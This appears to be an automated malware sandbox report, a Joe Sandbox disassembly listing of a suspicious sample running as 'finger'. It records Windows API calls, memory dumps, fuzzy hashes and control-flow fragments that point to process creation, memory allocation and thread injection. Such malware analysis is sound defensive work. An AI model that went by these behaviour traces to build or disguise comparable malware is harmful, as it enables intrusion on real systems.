                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                                      • Instruction ID: ab6ea7b657e06e692cd73636c0e07a0362d775806f82a1678350c96c7a0e8f5b
                                                                                                      • Opcode Fuzzy Hash: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                                      • Instruction Fuzzy Hash: 1231D2B5A00608ABCB14DF99C881EEFB7F9AF88714F108219F919A7241D734A951CFA4
                                                                                                      APIs
                                                                                                      • NtAllocateVirtualMemory.NTDLL(161FBA40,?,006181AF,00000000,00000004,00003000,?,?,?,?,?,006181AF,00601F4E), ref: 00619855
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2167126740-0
                                                                                                      • Opcode ID: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                                      • Instruction ID: 33c699b1e802ceea5b81bf3fe1c9fa57f9858ce8ec862efcd1280eab57059e08
                                                                                                      • Opcode Fuzzy Hash: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                                      • Instruction Fuzzy Hash: 652137B5A00609ABDB10DFA9CC41EEFB7B9EF88700F10861DFD19A7241D734A951CBA5
                                                                                                      APIs
                                                                                                      • NtDeleteFile.NTDLL(161FBA40), ref: 00619620
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DeleteFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 4033686569-0
                                                                                                      • Opcode ID: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                                      • Instruction ID: 114a0443f2aea431cb623577c28bd669c6864ee778e4e50cff9c0e68eb434911
                                                                                                      • Opcode Fuzzy Hash: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                                      • Instruction Fuzzy Hash: 4311E071600608BEDB20EB68CC42FEB77ACEF84710F10811CFA08A7281D775AA458BF5
                                                                                                      APIs
                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00619661
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction ID: f858eff6d0252e63b0f23dda40dc3e9f6246e5931e6f8ab8f5083bd0781dfe56
                                                                                                      • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction Fuzzy Hash: 84E08C762012047BC620EA5ADC41FDBBBADDFC6720F008419FA48A7241CA71BA12C7F9
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 5a90e2950ac59564da3333199581fca6ed52fdaa9ea5cec07be660a7b39fd826
                                                                                                      • Instruction ID: 709bcaeccebc97e6b7371385014e2658b043a331d2bab08c86d8c4ffe27d884e
                                                                                                      • Opcode Fuzzy Hash: 5a90e2950ac59564da3333199581fca6ed52fdaa9ea5cec07be660a7b39fd826
                                                                                                      • Instruction Fuzzy Hash: 84900231606C0412A140B1588884546405997E1301B55C051F0428554C8B148A5A6361
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 33403d723d5fb26d785116439aea343d584693d58b7c144a7c4ed11ada2eadaf
                                                                                                      • Instruction ID: 2231961ee8a76327dce745efc7827b63a826026c8d81d964a373de2c24ca78ff
                                                                                                      • Opcode Fuzzy Hash: 33403d723d5fb26d785116439aea343d584693d58b7c144a7c4ed11ada2eadaf
                                                                                                      • Instruction Fuzzy Hash: 09900261602904425140B1588804406605997E2301395C155B0558560C87188959A269
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 7e30a93c7a8332210ef2c15d9d82d1b2f26b7beee72541eaad5d46d909ba29c1
                                                                                                      • Instruction ID: 024e8c8aad868e519211465ea67f468ce821de3d927d0f4df5aee89b7b53aab8
                                                                                                      • Opcode Fuzzy Hash: 7e30a93c7a8332210ef2c15d9d82d1b2f26b7beee72541eaad5d46d909ba29c1
                                                                                                      • Instruction Fuzzy Hash: C2900261203804035105B1588414616405E87E1201B55C061F1018590DC62589957125
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 0951fe517f8be5123c675ded89e3b9ca1247f81a487cc8f7368aee75fe4d6e66
                                                                                                      • Instruction ID: e803cdd3d935d6d8b344a9b0c14f4715be502085a8abef133700f942847a2ca9
                                                                                                      • Opcode Fuzzy Hash: 0951fe517f8be5123c675ded89e3b9ca1247f81a487cc8f7368aee75fe4d6e66
                                                                                                      • Instruction Fuzzy Hash: D690023160680C02E150B1588414746005987D1301F55C051B0028654D87558B5976A1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 08f3e477535bfb371c0333597676e8e4a57fd0814c0f0d0779a9083998f070bd
                                                                                                      • Instruction ID: 74e7f356f3c27240e2f4023ec7ade43ee08f1d46840a08f532d1aa28bdc1deb9
                                                                                                      • Opcode Fuzzy Hash: 08f3e477535bfb371c0333597676e8e4a57fd0814c0f0d0779a9083998f070bd
                                                                                                      • Instruction Fuzzy Hash: 3690023120684C42E140B1588404A46006987D1305F55C051B0068694D97258E59B661
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 513ee7ff72e37862a281d4548ce1c28e017dffda3235dc3347058507e47f2c9f
                                                                                                      • Instruction ID: 22e617f4aaa89324a8704c4f3645dc1c29162258aeea93874e964d526eaedb82
                                                                                                      • Opcode Fuzzy Hash: 513ee7ff72e37862a281d4548ce1c28e017dffda3235dc3347058507e47f2c9f
                                                                                                      • Instruction Fuzzy Hash: A790023120280C02E180B158840464A005987D2301F95C055B0029654DCB158B5D77A1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 40df63f21435756f062879e78e041014b7edc861f6a20c63b69b2064db7dcc5a
                                                                                                      • Instruction ID: 25216e2b4fcf317c61420b39a096e3f9454d1f197cd41e85a734eb50c134a9e3
                                                                                                      • Opcode Fuzzy Hash: 40df63f21435756f062879e78e041014b7edc861f6a20c63b69b2064db7dcc5a
                                                                                                      • Instruction Fuzzy Hash: A8900225212804031105F5584704507009A87D6351355C061F1019550CD72189656121
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 20e4099cf57208bd50ab80fbe3f3113fff85d85b02f75109f06bab96a161748a
                                                                                                      • Instruction ID: 0d0d79fcbdbbb92385393fe1b3566d561b259f52ff2dbb4b622891e4b99a3e5b
                                                                                                      • Opcode Fuzzy Hash: 20e4099cf57208bd50ab80fbe3f3113fff85d85b02f75109f06bab96a161748a
                                                                                                      • Instruction Fuzzy Hash: D3900225222804021145F558460450B049997D7351395C055F141A590CC72189696321
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: fc9fb80cdefd403381afd5d312c2587bea6353664784a5ddfffaabf64af5ffe4
                                                                                                      • Instruction ID: 574b5f4470934903b0ee043e45e0ab60613d370e32faae80786205c68c54421f
                                                                                                      • Opcode Fuzzy Hash: fc9fb80cdefd403381afd5d312c2587bea6353664784a5ddfffaabf64af5ffe4
                                                                                                      • Instruction Fuzzy Hash: 7F90023160690802E100B1588514706105987D1201F65C451B0428568D87958A5575A2
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 57a8feb081fead6fea6629b00a79bb62b45d94008b319480ab49dd1aab5f9a64
                                                                                                      • Instruction ID: 9fe46e2eb082c442688c343ae34063b5486e2fce9c3328cf646e216ae8fb67f9
                                                                                                      • Opcode Fuzzy Hash: 57a8feb081fead6fea6629b00a79bb62b45d94008b319480ab49dd1aab5f9a64
                                                                                                      • Instruction Fuzzy Hash: D190022124685502E150B15C84046164059A7E1201F55C061B0818594D865589597221

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 518 600f69-600fde call 61b760 call 61c170 call 604700 call 5f13e0 call 611e40 530 601000-601005 518->530 531 600fe0-600ff1 PostThreadMessageW 518->531 531->530 532 600ff3-600ffd 531->532 532->530
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00600FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                                                                      • Instruction ID: 595a6a4e6411d7c7722e4ab9dba2ba286cbbc1945f5aa5a12dff34180fe6096d
                                                                                                      • Opcode Fuzzy Hash: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                                                                      • Instruction Fuzzy Hash: 3C11A571E40258B6EB2196908C42FDF7B7C9F41B90F048058FB04BB2C1DA746A0687E9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 502 600f5c-600f5d 503 600f7c-600f82 502->503 504 600f5f-600f67 502->504 505 600f89-600fde call 61c170 call 604700 call 5f13e0 call 611e40 503->505 506 600f84 call 61b760 503->506 515 601000-601005 505->515 516 600fe0-600ff1 PostThreadMessageW 505->516 506->505 516->515 517 600ff3-600ffd 516->517 517->515
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00600FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                                                                      • Instruction ID: a71887ed99f660986f3710f8c2e7472224f6d4882c529cb0f9f00ca5013ad93f
                                                                                                      • Opcode Fuzzy Hash: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                                                                      • Instruction Fuzzy Hash: 3C01F932E81258B6EB219690AC42FEFBB6D9F42750F048159FF14BF3C0DA75590287D9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 533 600f70-600fde call 61b760 call 61c170 call 604700 call 5f13e0 call 611e40 544 601000-601005 533->544 545 600fe0-600ff1 PostThreadMessageW 533->545 545->544 546 600ff3-600ffd 545->546 546->544
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00600FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                                                                      • Instruction ID: 249d07b56e4ea2cd0ab0931d0f9e8178a0fda01abcb5868e268964f604830784
                                                                                                      • Opcode Fuzzy Hash: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                                                                      • Instruction Fuzzy Hash: 3B019671D41358B6EB2196908C42FDFBB7C9F41B90F148059FB04BF2C1DA746A068BE9
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 00613D4D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                      • Opcode ID: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                                                                      • Instruction ID: 8ecc0c962441f5437a3ce340c48af91a2da21b08dbdbb690f08d8659dfe02830
                                                                                                      • Opcode Fuzzy Hash: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                                                                      • Instruction Fuzzy Hash: 21316EB1A01305BBD714DFA4D881FEAB7B9FF88714F04811CF659AB285D770AA40CBA4
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeUninitialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                      • Opcode ID: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                                                                      • Instruction ID: cd47b1f99fd761d3b1f050d45a22248055c197f4469a75d31a2b20dff7c045d9
                                                                                                      • Opcode Fuzzy Hash: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                                                                      • Instruction Fuzzy Hash: A8313EB6A0020A9FDB14DFD8D8809EFB7BABF88304B108559E505EB244D775AE45CBA1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeUninitialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                      • Opcode ID: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                                                                      • Instruction ID: 65e931ddf3f538e2aac89e2d38e3cc27eb689e08987afe079cd8a327a0dcea2c
                                                                                                      • Opcode Fuzzy Hash: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                                                                      • Instruction Fuzzy Hash: 7A3150B5A0020A9FDB14DFD8D8809EFB3BABF88304B108559E505EB344D775EE45CBA1
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 006199B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID: [4`
                                                                                                      • API String ID: 3298025750-1764788972
                                                                                                      • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction ID: 8586cd9decbc24a24c659218793562cd89712f3cbc5a62a0acf939f872cc95c8
                                                                                                      • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction Fuzzy Hash: 59E09272200204BBD610EF59DC45EEB37ADEFC9710F004408FD09A7242C771B8118BB9
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00604772
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction ID: 10ba5668027cea9be14281cc8111fcdb7577559fc9724b6860b9fad98a5159d4
                                                                                                      • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction Fuzzy Hash: 3D0171B5D4020DABDF54EBE4EC42FDEB3799B54318F044198EA0897281FA30EB44CB91
                                                                                                      APIs
                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,006084CE,00000010,?,?,?,00000044,?,00000010,006084CE,?,00000000,?), ref: 00619A60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateInternalProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2186235152-0
                                                                                                      • Opcode ID: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                                                                      • Instruction ID: aa383df3cbfa17acbd8fad365d057407c4adc4dd4855edb91dadfd3df3e4b3a3
                                                                                                      • Opcode Fuzzy Hash: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                                                                      • Instruction Fuzzy Hash: 540192B2215508BBDB44DE99DC85EEB77ADEF8C754F408608BA0DE3241D630F951CBA4
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005F9F05
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                                      • Instruction ID: edfe3ca648574745a3de0669f2ae4d242299b6faec00c4da7ad8630466d6021f
                                                                                                      • Opcode Fuzzy Hash: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                                      • Instruction Fuzzy Hash: B8F0653338070436E22065E99C02FDB764CDB80761F140429F70CDA1C1D5A6B84146E8
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005F9F05
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                                                                      • Instruction ID: 6732c09f5fa7928a20d40b4bedcab9af7309f452f7a071e9db2e0663a9624021
                                                                                                      • Opcode Fuzzy Hash: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
